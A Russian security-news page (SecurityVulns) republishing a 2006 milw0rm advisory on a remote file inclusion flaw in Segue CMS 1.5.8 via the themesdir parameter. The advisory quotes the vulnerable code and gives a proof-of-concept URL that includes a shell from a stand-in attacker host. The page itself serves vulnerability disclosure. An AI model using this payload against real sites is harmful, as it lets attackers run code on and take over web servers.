Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

  phpPowerCards 2.10 (txt.inc.
php) Remote Code Execution Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.
asp) Remote User Pass Change

  WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability

From:nuffsaid <nuffsaid_(at)_newbslove.us>
Date:23 октября 2006 г.
Subject:Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

+--------------------------------------------------------------------------------
-----------
+ Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
+--------------------------------------------------------------------------------
-----------
+ Affected Software .: Segue CMS <= 1.5.8
+ Vendor ............: http://segue.middlebury.edu/
+ Download ..........: http://sourceforge.net/project/showfiles.php?group_id=82171
+ Description .......: "Segue is an open source collaborative content management system"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+--------------------------------------------------------------------------------
-----------
+ Details:
+ Segue CMS themes/program/themesettings.inc.php does not intialize the $themesdir variable
+ before using it to include files, assuming register_globals = on, we can intialize the
+ variable in a query string and include a remote file of our choice. Tested and working on
+ version 1.5.4 and 1.5.8 (previous versions may also be affected).
+
+ Vulnerable Code:
+ themes/program/themesettings.inc.php, line(s) 02: include("$themesdir/$theme/colors.inc.php");
+
+ Proof of Concept:
+ http://[target]/[path]/themes/program/themesettings.inc.php?themesdir=class="fixed">http://evilsite.com/shell.php?
+--------------------------------------------------------------------------------
-----------

# milw0rm.com [2006-10-19]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород